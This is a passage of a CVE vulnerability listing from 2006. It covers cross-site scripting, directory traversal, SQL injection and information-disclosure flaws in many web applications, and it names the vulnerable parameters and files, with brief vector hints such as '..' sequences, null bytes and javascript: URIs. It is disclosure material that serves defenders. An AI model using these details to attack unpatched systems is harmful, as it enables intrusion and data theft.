formname parameter with a filename containing a dangerous file extension and a trailing %00. [CVE-2006-0934] Cross-site scripting (XSS) vulnerability in webinsta Limbo 1.0.4.2 allows remote attackers to inject arbitrary web script or HTML via the message field in the Contact Form. [CVE-2006-0933] Cross-site scripting (XSS) vulnerability in PHPX 3.5.9 allows remote attackers to inject arbitrary web script or HTML via a javascript URI in a url XCode tag in a posted message. NOTE: the provenance of this information is unknown [CVE-2006-0930] Directory traversal vulnerability in Webmail in ArGoSoft Mail Server Pro 1.8 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the UIDL parameter. [CVE-2006-0927] Multiple cross-site scripting (XSS) vulnerabilities in the JGS-XA JGS-Gallery Addon 4.0.0 and earlier for Woltlab Burning Board (wBB) 2.x allow remote attackers to inject arbitrary web script or HTML via the (1) userid parameter in (a) jgs_galerie_slideshow.php and (b) jgs_galerie_scroll.php, and the (2) katid parameter in (c) jgs_galerie_slideshow.php. [CVE-2006-0924] Cross-site scripting (XSS) vulnerability in Brown Bear iCal 3.10 allows remote attackers to inject arbitrary web script or HTML via the Calendar Text field when a new event is added. NOTE: the provenance of this information is unknown [CVE-2006-0923] Multiple cross-site scripting (XSS) vulnerabilities in MyPHPNuke (MPN) 1.88 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the letter parameter in reviews.php and (2) the dcategory parameter in download.php. [CVE-2006-0920] Oi! Email Marketing System 3.0 (aka Oi! 3) stores the server's FTP password in cleartext on a Configuration web page, which allows local users with superadministrator privileges, or attackers who have obtained access to the web page, to view the password. [CVE-2006-0917] Melange Chat Server (aka M-Chat), when accessed via a web browser, automatically sends cookies and other sensitive information for a server to any port specified in the associated link, which allows local users on that server to read the cookies from HTTP headers and possibly gain sensitive information, such as credentials, by setting up a listening port and reading the credentials when the victim clicks on the link. [CVE-2006-0896] Cross-site scripting (XSS) vulnerability in Sources/Register.php in Simple Machine Forum (SMF) 1.0.6 allows remote attackers to inject arbitrary web script or HTML via the X-Forwarded-For HTTP header field. [CVE-2006-0895] NOCC Webmail 1.0 allows remote attackers to obtain the installation path via a direct request to html/header.php. [CVE-2006-0894] Multiple cross-site scripting (XSS) vulnerabilities in NOCC Webmail 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the html_error_occurred parameter in error.php, (2) html_filter_select parameter in filter_prefs.php, (3) html_no_mail parameter in no_mail.php, the (4) page_line, (5) prev, and (6) next parameters in html_bottom_table.php, and the (7) _SESSION['nocc_theme'] parameter in footer.php. [CVE-2006-0893] NOCC Webmail 1.0 allows remote attackers to obtain sensitive information via a direct request to (1) the profiles directory, which leaks e-mail addresses contained in filenames of profiles, and (2) the tmp directory, which lists names of uploaded attachments. [CVE-2006-0892] NOCC Webmail 1.0 stores e-mail attachments in temporary files with predictable filenames, which makes it easier for remote attackers to execute arbitrary code by accessing the e-mail attachment via directory traversal vulnerabilities. [CVE-2006-0891] Multiple directory traversal vulnerabilities in NOCC Webmail 1.0 allow remote attackers to include arbitrary files via .. (dot dot) sequences and a trailing NULL (%00) byte in (1) the _SESSION['nocc_theme'] parameter in (a) html/footer.php [CVE-2006-0889] Cross-site scripting (XSS) vulnerability in Calcium 3.10.1 allows remote attackers to inject arbitrary web script or HTML via the EventText parameter. NOTE: the provenance of this information is unknown [CVE-2006-0886] Cross-site scripting (XSS) vulnerability in register.php in DEV web management system 1.5 allows remote attackers to inject arbitrary web script or HTML via the "City/Region" field (mesto variable). NOTE: the provenance of this information is unknown [CVE-2006-0885] Cross-site scripting (XSS) vulnerability in show_news.php in CuteNews 1.4.1 allows remote attackers to inject arbitrary web script or HTML via the show parameter. [CVE-2006-0880] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Noah's Classifieds 1.3 allow remote attackers to inject arbitrary web script or HTML via the (1) inf parameter [CVE-2006-0877] Cross-site scripting vulnerability in Easy Forum 2.5 allows remote attackers to inject arbitrary web script or HTML via the image variable. [CVE-2006-0875] Cross-site scripting vulnerability in ratefile.php in RunCMS 1.3a5 allows remote attackers to inject arbitrary web script or HTML via the lid parameter. [CVE-2006-0867] Buffer overflow in certain versions of South River (aka SRT) WebDrive, possibly version 6.08 build 1131 and version 8, allows remote attackers to cause a denial of service (application crash and persistent erratic behavior) via a long string in the name entry field. [CVE-2006-0860] Multiple cross-site scripting (XSS) vulnerabilities in Michael Salzer Guestbox 0.6, and other versions before 0.8, allow remote attackers to inject arbitrary web script or HTML via (1) HTML tags that follow a "http://" string, which bypasses a regular expression check, and (2) other unspecified attack vectors. [CVE-2006-0857] Cross-site scripting (XSS) vulnerability in Chatbox Plugin 1.0 in e107 0.7.2 allows remote attackers to inject arbitrary HTML or web script via a Chatbox, as demonstrated using a SCRIPT element. [CVE-2006-0846] Multiple cross-site scripting (XSS) vulnerabilities in Leif M. Wright's Blog 3.5 allow remote attackers to inject arbitrary web script or HTML via the (1) Referer and (2) User-Agent HTTP headers, which are stored in a log file and not sanitized when the administrator views the "Log" page, possibly using the ViewCommentsLog function. [CVE-2006-0843] Leif M. Wright's Blog 3.5 stores the config file and other txt files under the web root with insufficient access control, which allows remote attackers to read the administrator's password. [CVE-2006-0842] Cross-site scripting (XSS) vulnerability in Calacode @Mail 4.3 allows remote attackers to inject arbitrary web script or HTML via a modified javascript: string in the SRC attribute of an IMG element in an e-mail message, as demonstrated by "java&#09 [CVE-2006-0841] Multiple cross-site scripting (XSS) vulnerabilities in Mantis 1.00rc4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) hide_status, (2) handler_id, (3) user_monitor, (4) reporter_id, (5) view_type, (6) show_severity, (7) show_category, (8) show_status, (9) show_resolution, (10) show_build, (11) show_profile, (12) show_priority, (13) highlight_changed, (14) relationship_type, and (15) relationship_bug parameters in (a) view_all_set.php [CVE-2006-0840] manage_user_page.php in Mantis 1.00rc4 and earlier does not properly handle a sort parameter containing a ' (quote) character, which allows remote attackers to trigger a SQL error that may be repeatedly reported to a user who makes subsequent web accesses with the MANTIS_MANAGE_COOKIE cookie. NOTE: this issue might be the same as vector 2 in CVE-2005-4519. [CVE-2006-0835] SQL injection vulnerability in dropbase.php in MitriDAT Web Calendar Pro allows remote attackers to modify internal SQL queries and cause a denial of service (inaccessible database) via the tabls parameter. [CVE-2006-0834] Uniden UIP1868P VoIP Telephone and Router has a default password of admin for the web-based configuration utility, which allows remote attackers to obtain sensitive information on the device such as telephone numbers called, and possibly connect to other hosts. NOTE: it is possible that this password was configured by a reseller, not the original vendor [CVE-2006-0833] Multiple cross-site scripting (XSS) vulnerabilities in Barracuda Directory 1.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors to the (1) Add URL and (2) Suggest Category module. NOTE: the provenance of this information is unknown [CVE-2006-0830] The scripting engine in Internet Explorer allows remote attackers to cause a denial of service (resource consumption) and possibly execute arbitrary code via a web page that contains a recurrent call to an infinite loop in Javascript or VBscript, which consumes the stack, as demonstrated by resetting the "location" variable within the loop. [CVE-2006-0829] Cross-site scripting vulnerability in E-Blah Platinum 9.7 allows remote attackers to inject arbitrary web script or HTML via the referer (HTTP_REFERER), which is not sanitized when the log file is viewed by the administrator using "Click Log". [CVE-2006-0828] Unspecified vulnerability in ESS/ Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allows remote attackers to "reduce effectiveness of security features" via unknown attack vectors. [CVE-2006-0827] Cross-site scripting vulnerability in ESS/ Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-0826] Unspecified vulnerability in ESS/ Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allows remote attackers to cause a denial of service via a crafted Postscript request. [CVE-2006-0825] Multiple unspecified vulnerabilities in ESS/ Network Controller and MicroServer Web Server in Xerox WorkCentre Pro and Xerox WorkCentre running software 13.027.24.015 and 14.027.24.015 allow remote attackers to bypass authentication or gain "unauthorized network access" via unknown attack vectors. [CVE-2006-0820] Cross-site scripting (XSS) vulnerability in Dwarf HTTP Server 1.3.2 allows remote attackers to inject arbitrary web script or HTML via unspecified error messages. [CVE-2006-0818] Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (2) VisNetic MailServer before 8.5.0.5 allows remote authenticated users to include arbitrary files via a modified language parameter and a full Windows or UNC pathname in the lang_settings parameter to mail/index.html, which is not properly sanitized by the validatefolder PHP function, possibly due to an incomplete fix for CVE-2005-4558. [CVE-2006-0817] Absolute path directory traversal vulnerability in (a) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (b) VisNetic MailServer before 8.5.0.5 allows remote attackers to include arbitrary files via a full Windows path and drive letter in the (1) language parameter in accounts/inc/include.php and (2) lang_settings parameter in admin/inc/include.php, which is not properly sanitized by the securepath function, a related issue to CVE-2005-4556. [CVE-2006-0815] NetworkActiv Web Server 3.5.15 allows remote attackers to read script source code via a crafted URL with a "/" (forward slash) after the file extension. [CVE-2006-0811] Cross-site scripting (XSS) vulnerability in reguser.php in Skate Board 0.9 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters involved with the registration form. [CVE-2006-0808] MUTE 0.4 allows remote attackers to cause a denial of service (messages not forwarded) and obtain sensitive information about a target by filling a client's mWebCache cache with malicious "zombie" nodes. [CVE-2006-0806] Multiple cross-site scripting (XSS) vulnerabilities in ADOdb 4.71, as used in multiple packages such as phpESP, allow remote attackers to inject arbitrary web script or HTML via (1) the next_page parameter in adodb-pager.inc.php and (2) other unspecified vectors related to PHP_SELF. [CVE-2006-0802] Cross-site scripting (XSS) vulnerability in the NS-Languages module for PostNuke 0.761 and earlier, when magic_quotes_gpc is enabled, allows remote attackers to inject arbitrary web script or HTML via the language parameter in a missing or translation operation. [CVE-2006-0800] Interpretation conflict in PostNuke 0.761 and earlier allows remote attackers to conduct cross-site scripting (XSS) attacks via HTML tags with a trailing "<" character, which is interpreted as a ">" character by some web browsers but bypasses the blacklist protection in (1) the pnVarCleanFromInput function in pnAPI.php, (2) the pnSecureInput function in pnAntiCracker.php, and (3) the htmltext parameter in an edituser operation to user.php. [CVE-2006-0799] Microsoft Internet Explorer allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page with an anchor element with a legitimate "href" attribute, a form whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. NOTE: this issue is very similar to CVE-2004-1104, although the manipulations are slightly different. [CVE-2006-0796] Cross-site scripting (XSS) vulnerability in default.php in Clever Copy 3.0 allows remote attackers to inject arbitrary web script or HTML via the Subject field when sending private messages (privatemessages.php). NOTE: the provenance of this information is unknown [CVE-2006-0794] help.php in V-webmail 1.6.2 allows remote attackers to obtain the installation path via unspecified invalid parameters. NOTE: the provenance of this information is unknown [CVE-2006-0793] frameset.php in V-webmail 1.6.2 allows remote attackers to conduct phishing attacks by referencing arbitrary websites in the rframe parameter. NOTE: the provenance of this information is unknown [CVE-2006-0792] Cross-site scripting (XSS) vulnerability in preferences.personal.php in V-webmail 1.6.2 allows remote attackers to inject arbitrary web script or HTML via the newid parameter. NOTE: the provenance of this information is unknown [CVE-2006-0783] Cross-site scripting (XSS) vulnerability in page.php in in Siteframe Beaumont, possibly 5.0.2 or 5.0.1a, allows remote attackers to inject arbitrary web script or HTML via the comment_text parameter to the user comment page (/edit/Comment). [CVE-2006-0782] Unspecified vulnerability in weblog.pl in PerlBlog 1.09b and earlier allows remote attackers to create arbitrary files and possibly execute arbitrary code via unspecified attack vectors related to improper handling of (1) the reply parameter, possibly involving injection of (2) the name parameter and (3) the body parameter. [CVE-2006-0781] Directory traversal vulnerability in weblog.pl in PerlBlog 1.09b and earlier allows remote attackers to read certain files via the month parameter. [CVE-2006-0780] Multiple cross-site scripting (XSS) vulnerabilities in weblog.pl in PerlBlog 1.09b and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name and (2) email parameters. [CVE-2006-0779] Cross-site scripting (XSS) vulnerability in u2u.php in XMB Forums 1.9.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the username parameter, as demonstrated using a URL-encoded iframe tag. [CVE-2006-0776] Cross-site scripting (XSS) vulnerability in guestex.pl in Teca Scripts Guestex 1.0 allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2006-0773] Cross-site scripting (XSS) vulnerability in Hitachi Business Logic - Container 02-03 through 03-00-/B on Windows, and 03-00 through 03-00-/B on Linux, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the extended receiving box function. [CVE-2006-0770] Cross-site scripting (XSS) vulnerability in calendar.php in MyBulletinBoard (MyBB) 1.0.4 allows remote attackers to inject arbitrary web script or HTML via a URL that is not sanitized before being returned as a link in "advanced details". NOTE: the provenance of this information is unknown [CVE-2006-0763] Cross-site scripting (XSS) vulnerability in dowebmailforward.cgi in cPanel allows remote attackers to inject arbitrary web script or HTML via a URL encoded value in the fwd parameter. [CVE-2006-0760] LightTPD 1.4.8 and earlier, when the web root is on a case-insensitive filesystem, allows remote attackers to bypass URL checks and obtain sensitive information via file extensions with unexpected capitalization, as demonstrated by a request for index.PHP when the configuration invokes the PHP interpreter only for ".php" names. [CVE-2006-0758] Multiple cross-site scripting (XSS) vulnerabilities in HiveMail 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via a URL encoded expression in the query string in (1) index.php and (2) possibly certain other scripts, which is not properly cleansed when accessed from the $_SERVER['PHP_SELF'] variable. [CVE-2006-0733] DISPUTED ** Cross-site scripting (XSS) vulnerability in WordPress 2.0.0 allows remote attackers to inject arbitrary web script or HTML via scriptable attributes such as (1) onfocus and (2) onblur in the "author's website" field. NOTE: followup comments to the researcher's web log suggest that this issue is only exploitable by the same user who injects the XSS, so this might not be a vulnerability. [CVE-2006-0732] Directory traversal vulnerability in SAP Business Connector (BC) 4.6 and 4.7 allows remote attackers to read or delete arbitrary files via the fullName parameter to (1) sapbc/SAP/chopSAPLog.dsp or (2) invoke/sap.monitor.rfcTrace/deleteSingle. Details will be updated after the grace period has ended. NOTE: SAP Business Connector is an OEM version of webMethods Integration Server. webMethods states that this issue can only occur when the product is installed as root/admin, and if the attacker has access to a general purpose port [CVE-2006-0728] SQL injection vulnerability in search.php in webSPELL 4.01.00 and earlier allows remote attackers to inject arbitrary SQL commands via the title_op parameter. [CVE-2006-0726] Cross-site scripting (XSS) vulnerability in linking.php in CPG-Nuke Dragonfly CMS 9.0.6.1 allows remote attackers to inject arbitrary web script or HTML via a URI that is generated when creating a list of online users. [CVE-2006-0715] Cross-site scripting (XSS) vulnerability in sNews 1.3 allows remote attackers to inject arbitrary web script or HTML via the comment field. [CVE-2006-0707] PyBlosxom before 1.3.2, when running on certain webservers, allows remote attackers to read arbitrary files via an HTTP request with multiple leading / (slash) characters, which is accessed using the PATH_INFO variable. [CVE-2006-0706] Cross-site scripting vulnerability in eintrag.php in G\xF5stebuch (Gastebuch) before 1.3.3 allows remote attackers to inject arbitrary web script or HTML via the URL, which is used in the homepage parameter. [CVE-2006-0704] iE Integrator 4.4.220114, when configured without a "bespoke error page" in acm.ini, allows remote attackers to obtain sensitive information via a URL that calls a non-existent .aspx script in the integrator/apps directory, which results in an error message that displays the installation path, web server name, IP, and port, session cookie information, and the IIS system username. [CVE-2006-0699] Cross-site scripting (XSS) vulnerability in search.php in QWikiWiki 1.5, and possibly 1.5.1 and other versions, allows remote attackers to inject arbitrary web script or HTML via the query parameter. [CVE-2006-0694] Unspecified vulnerability in the loaders (load_.php) in Ansilove before 1.03 allows remote attackers to read arbitrary files via unspecified vectors involving "converting files accessible by the webserver". [CVE-2006-0689] Cross-site scripting (XSS) vulnerability in the Registration Form in TTS Time Tracking Software 3.0 allows remote attackers to inject arbitrary web script or HTML via the UserName parameter. [CVE-2006-0683] Cross-site scripting (XSS) vulnerability in Virtual Hosting Control System (VHCS) 2.4.7.1 with v.1 patch and earlier allows remote attackers to inject arbitrary web script or HTML via the username, which is recorded in a log file but not properly handled when the administrator uses the admin log utility to read the log file. [CVE-2006-0682] Multiple cross-site scripting (XSS) vulnerabilities in bbcodes system in e107 before 0.7.2 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-0680] Unspecified vulnerability in WebGUI before 6.8.6-gamma allows remote attackers to create an account, when anonymous registration is disabled, via a certain URL. [CVE-2006-0676] Cross-site scripting (XSS) vulnerability in header.php in PHP-Nuke 6.0 to 7.8 allows remote attackers to inject arbitrary web script or HTML via the pagetitle parameter. [CVE-2006-0675] Cross-site scripting (XSS) vulnerability in search.php in Siteframe 5.0.1 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2006-0664] Cross-site scripting (XSS) vulnerability in config_defaults_inc.php in Mantis before 1.0 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. NOTE: the provenance of this information is unknown [CVE-2006-0663] Multiple cross-site scripting (XSS) vulnerabilities in Lotus Domino iNotes Client 6.5.4 and 7.0 allow remote attackers to inject arbitrary web script or HTML via (1) an email subject [CVE-2006-0662] Cross-site scripting (XSS) vulnerability in Lotus Domino iNotes Client 6.5.4 allows remote attackers to inject arbitrary web script or HTML via email with attached html files, which are directly rendered in the browser. [CVE-2006-0661] Cross-site scripting (XSS) vulnerability in Scriptme SmE GB Host 1.21 and SmE Blog Host allows remote attackers to inject arbitrary web script or HTML via the BBcode url tag. [CVE-2006-0657] Cross-site scripting (XSS) vulnerability in Softcomplex PHP Event Calendar 1.5 allows remote authenticated users to inject arbitrary web script or HTML, and corrupt data, via the (1) username and (2) password parameters, which are not sanitized before being written to users.php. NOTE: while this issue was originally reported as XSS, the primary issue might be direct static code injection with resultant XSS. [CVE-2006-0655] Multiple cross-site scripting (XSS) vulnerabilities in (1) link_edited.php and (2) link_added.php in Hinton Design phpht Topsites 1.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-0650] Cross-site scripting (XSS) vulnerability in cpaint2.inc.php in the CPAINT library before 2.0.3, as used in multiple scripts, allows remote attackers to inject arbitrary web script or HTML via the cpaint_response_type parameter, which is displayed in a resulting error message, as demonstrated using a hex-encoded IFRAME tag. [CVE-2006-0649] Cross-site scripting (XSS) vulnerability in DataparkSearch before 4.37 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2006-0643] Cross-site scripting (XSS) vulnerability in WiredRed e/pop Web Conferencing 4.1.0.755 allows remote authenticated users to inject arbitrary web script or HTML via the topic name of a conference. [CVE-2006-0642] Trend Micro ServerProtect 5.58, and possibly InterScan Messaging Security Suite and InterScan Web Security Suite, have a default configuration setting of "Do not scan compressed files when Extracted file count exceeds 500 files," which may be too low in certain circumstances, which allows remote attackers to bypass anti-virus checks by sending compressed archives containing many small files. NOTE: since this is related to a configuration setting that has an operational impact that might vary depending on the environment, and the product is claimed to report a message when the compressed file exceeds specified limits, perhaps this should not be included in CVE. [CVE-2006-0641] Orbicule Undercover uses a third-party web server to determine the IP address through which the computer is accessing the Internet, but does not document this third-party disclosure, which leads to a potential privacy leak that might allow transmission of sensitive information to an unintended remote destination. [CVE-2006-0639] Cross-site scripting (XSS) vulnerability in search.php in MyBB (aka MyBulletinBoard) 1.0.2 allows remote attackers with knowledge of the table prefix to inject arbitrary web script or HTML via a URL encoded value of the keywords parameter, as demonstrated by %3Cscript%3E. [CVE-2006-0627] Cross-site scripting (XSS) vulnerability in Clever Copy 2.0, 2.0a, and 3.0 allows remote attackers to inject arbitrary web script or HTML via the (1) Referer or (2) X-Forwarded-For headers in an HTTP request, which are not properly handled when the administrator accesses Site Stats. [CVE-2006-0613] Unspecified vulnerability in Java Web Start after 1.0.1_02, as used in J2SE 5.0 Update 5 and earlier, allows remote attackers to obtain privileges via unspecified vectors involving untrusted applications. [CVE-2006-0609] Cross-site scripting (XSS) vulnerability in add.php in Hinton Design phphd 1.0 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2006-0605] Multiple cross-site scripting (XSS) vulnerabilities in Unknown Domain Shoutbox 2005.07.21 allow remote attackers to inject arbitrary web script or HTML, possibly via the (1) Handle or (2) Message fields. [CVE-2006-0603] Multiple cross-site scripting vulnerabilities in signed.php in Hinton Design phphg Guestbook 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) location, (2) website, or (3) message parameter. [CVE-2006-0593] Cross-site scripting (XSS) vulnerability in PHP-Fusion before 6.00.304 allows remote attackers to inject arbitrary web script or HTML via the (1) shout_name field in shoutbox_panel.php and the (2) comments field in comments_include.php. [CVE-2006-0577] Lexmark X1185 printer allows local users to gain SYSTEM privileges by navigating to the "Appearance" dialog and selecting the "Additional styles (skins) are available on the Lexmark web site" option, which launches a web browser that is running with SYSTEM privileges. [CVE-2006-0574] Cross-site scripting (XSS) vulnerability in mime/handle.html in cPanel 10 allows remote attackers to inject arbitrary web script or HTML via the (1) file extension or (2) mime-type. [CVE-2006-0573] Multiple cross-site scripting (XSS) vulnerabilies in cPanel 10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) email parameter to (a) editquota.html or (b) dodelpop.html [CVE-2006-0570] Multiple SQL injection vulnerabilities in phpstatus 1.0, when gpc_magic_quotes is disabled, allow remote attackers to execute arbitrary SQL commands and bypass authentication via (1) the username parameter in check.php and (2) unknown attack vectors in the administrative interface. [CVE-2006-0569] Cross-site scripting (XSS) vulnerability in user_class.php in Papoo 2.1.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the username field during the registration of a new account. NOTE: the provenance of this information is unknown [CVE-2006-0568] Cross-site scripting (XSS) vulnerability in throw.main in Outblaze allows remote attackers to inject arbitrary web script or HTML via the file parameter. [CVE-2006-0567] Directory traversal vulnerability in Files Xaraya module before 0.5.1, when the Archive Directory field on the Modify Config page is blank, allows remote attackers to access files outside of the web root via ".." (dot dot) sequences. [CVE-2006-0562] Cross-site scripting (XSS) vulnerability in problem.php in PluggedOut Blog 1.9.9c allows remote attackers to inject arbitrary web script or HTML via the data parameter. [CVE-2006-0559] Format string vulnerability in the SMTP server for McAfee WebShield 4.5 MR2 and earlier allows remote attackers to execute arbitrary code via format strings in the domain name portion of a destination address, which are not properly handled when a bounce message is constructed. [CVE-2006-0542] Multiple SQL injection vulnerabilities in config.php in NukedWeb GuestBookHost 2005.04.25 allow remote attackers to execute arbitrary SQL commands via the (1) email and (2) password parameters. [CVE-2006-0541] Multiple cross-site scripting (XSS) vulnerabilities in Tachyon Vanilla Guestbook 1.0 beta allow remote attackers to inject arbitrary web script or HTML via unknown vectors related to "posting new messages." [CVE-2006-0536] Cross-site scripting (XSS) vulnerability in neomail.pl in NeoMail 1.27 allows remote attackers to inject arbitrary web script or HTML via the sort parameter. NOTE: some sources say that the affected parameter is "date," but the demonstration URL shows that it is "sort". [CVE-2006-0535] Multiple cross-site scripting (XSS) vulnerabilities in Community Server allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. NOTE: this candidate does not contain any actionable or distinguishing information. Perhaps it should not be included in CVE. NOTE: the provenance of this information is unknown [CVE-2006-0534] Multiple cross-site scripting (XSS) vulnerabilities in default.asp in CyberShop Ultimate E-commerce allow remote attackers to inject arbitrary web script or HTML via the (1) ortak or (2) kat parameter. [CVE-2006-0533] Cross-site scripting (XSS) vulnerability in webmailaging.cgi in cPanel allows remote attackers to inject arbitrary web script or HTML via the numdays parameter. [CVE-2006-0532] Cross-site scripting (XSS) vulnerability in resultat.asp in SoftMaker Shop allows remote attackers to inject arbitrary web script or HTML via a strSok parameter containing a javascript: URI in an IMG SRC attribute. [CVE-2006-0524] Cross-site scripting (XSS) vulnerability in ashnews.php in Derek Ashauer ashNews 0.83 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2006-0521] Cross-site scripting (XSS) vulnerability in results.php in BrowserCRM allows remote attackers to inject arbitrary web script or HTML via certain manipulations of the query parameter, as demonstrated using an IMG SRC tag. [CVE-2006-0518] Cross-site scripting (XSS) vulnerability in index.php3 in SPIP 1.8.2-e and earlier and 1.9 Alpha 2 (5539) and earlier allows remote attackers to inject arbitrary web script or HTML via the lang parameter. [CVE-2006-0515] Cisco PIX/ASA 7.1.x before 7.1(2) and 7.0.x before 7.0(5), PIX 6.3.x before 6.3.5(112), and FWSM 2.3.x before 2.3(4) and 3.x before 3.1(7), when used with Websense/N2H2, allows remote attackers to bypass HTTP access restrictions by splitting the GET method of an HTTP request into multiple packets, which prevents the request from being sent to Websense for inspection, aka bugs CSCsc67612, CSCsc68472, and CSCsd81734. [CVE-2006-0513] Directory traversal vulnerability in pkmslogout in Tivoli Web Server Plug-in 5.1.0.10 in Tivoli Access Manager (TAM) 5.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter. [CVE-2006-0509] Multiple cross-site scripting (XSS) vulnerabilities in clients.php in Cerberus Helpdesk, possibly 2.7, allow remote attackers to inject arbitrary web script or HTML via (1) the contact_search parameter and (2) unspecified url fields. [CVE-2006-0508] Easy CMS stores the images directory under the web document root with insufficient access control and browsing enabled, which allows remote attackers to list and possibly read images that are stored in that directory. [CVE-2006-0506] Cross-site scripting (XSS) vulnerability in index.php in Nuked-klaN 1.7 allows remote attackers to inject arbitrary web script or HTML via the letter parameter. [CVE-2006-0504] Unspecified vulnerability in MailEnable Enterprise Edition before 1.2 allows remote attackers to cause a denial of service (CPU utilization) by viewing "formatted quoted-printable emails" via webmail. [CVE-2006-0501] Cross-site scripting (XSS) vulnerability in MyCO Guestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via the Name field, when registering a user. [CVE-2006-0500] MyCO Guestbook 1.0 stores the admin directory under the web document root with insufficient access control, which allows remote attackers to perform unspecified privileged actions by directly accessing files via a URL. [CVE-2006-0499] Cross-site scripting (XSS) vulnerability in rlink.php in Rlink 1.0.0 module for phpBB allows remote attackers to inject arbitrary web script or HTML via the url parameter. NOTE: the provenance of this information is unknown [CVE-2006-0498] Multiple cross-site scripting (XSS) vulnerabilities in PHP GEN before 1.4 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-0496] Cross-site scripting (XSS) vulnerability in Mozilla 1.7.12 and possibly earlier, Mozilla Firefox 1.0.7 and possibly earlier, and Netscape 8.1 and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the -moz-binding (Cascading Style Sheets) CSS property, which does not require that the style sheet have the same origin as the web page, as demonstrated by the compromise of a large number of LiveJournal accounts. [CVE-2006-0495] Cross-site scripting (XSS) vulnerability in the Add Thread to Favorites feature in usercp2.php in MyBB (aka MyBulletinBoard) 1.02 allows remote attackers to inject arbitrary web script or HTML via an HTTP Referer header ($url variable). [CVE-2006-0493] Cross-site scripting (XSS) vulnerability in MG2 (formerly known as Minigal) 0.5.1 allows remote attackers to inject arbitrary web script or HTML via the Name field in a comment associated with a picture. [CVE-2006-0480] Cross-site scripting (XSS) vulnerability in the Articles module in sPaiz-Nuke allows remote attackers to inject arbitrary web script or HTML via the query parameter in the search file. [CVE-2006-0478] CRE Loaded 6.15 allows remote attackers to perform privileged actions, including uploading and creating arbitrary files, via a direct request to files.php. NOTE: the vendor states "The initial announcement of this risk was made on our website... and it included a patch which will close the vulnerability on all known 6.0x and 6.1x releases. We strongly encourage users of CRE Loaded 6.x, osCMax, and other users of osCommerce who have installed HTMLArea based WYSIWYG editors and Admin Access with Levels to modify thier installations at the earliest possible moment." [CVE-2006-0473] Cross-site scripting (XSS) vulnerability in the bbcode function in weblog.php in my little homepage my little weblog, as last modified in April 2004, allows remote attackers to inject arbitrary Javascript via a javascript URI in BBcode link tags. [CVE-2006-0470] Cross-site scripting (XSS) vulnerability in search.php in MyBulletinBoard (MyBB) 1.02 allows remote attackers to inject arbitrary web script or HTML via the (1) sortby and (2) sortordr parameters, which are not properly handled in a redirection. [CVE-2006-0469] Cross-site scripting (XSS) vulnerability in UebiMiau 2.7.9, and possibly earlier versions, allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG tag. [CVE-2006-0466] Cross-site scripting (XSS) vulnerability in search.asp in Goldstag Content Management System allows remote attackers to inject arbitrary web script or HTML via the text parameter. [CVE-2006-0465] Cross-site scripting (XSS) vulnerability in risultati_ricerca.php in active121 Site Manager allows remote attackers to inject arbitrary web script or HTML via the cerca parameter. [CVE-2006-0463] Cross-site scripting (XSS) vulnerability in IdeoContent Manager allows remote attackers to inject arbitrary web script or HTML via the (1) goto_id parameter to index.php or (2) page parameter to news_full.php. [CVE-2006-0461] Cross-site scripting (XSS) vulnerability in core.input.php in ExpressionEngine 1.4.1 allows remote attackers to inject arbitrary web script or HTML via HTTP_REFERER (referer). [CVE-2006-0446] Unspecified vulnerability in WeBWorK 2.1.3 and 2.2-pre1 allows remote privilged attackers to execute arbitrary commands as the web server via unknown attack vectors. [CVE-2006-0445] index.php in Phpclanwebsite 1.23.1 allows remote authenticated users to obtain the installation path by specifying an invalid file name to the uploader page, as demonstrated by "\", which will display the full path of uploader.php. NOTE: this might be the result of a file inclusion vulnerability. [CVE-2006-0444] SQL injection vulnerability in index.php in Phpclanwebsite (aka PCW) 1.23.1 allows remote attackers to execute arbitrary SQL commands via the (1) par parameter in the post function on the forum page and possibly the (2) poll_id parameter on the poll page. NOTE: the poll_id vector can also allow resultant cross-site scripting (XSS) from an unquoted error message for invalid SQL syntax. [CVE-2006-0443] Cross-site scripting (XSS) vulnerability in archive.php in CheesyBlog 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) realname and (2) comment parameters, or (3) via a javascript URI in the url parameter, when adding a comment. [CVE-2006-0442] Multiple cross-site scripting (XSS) vulnerabilities in usercp.php in MyBulletinBoard (MyBB) 1.02 allow remote attackers to inject arbitrary web script or HTML via the (1) 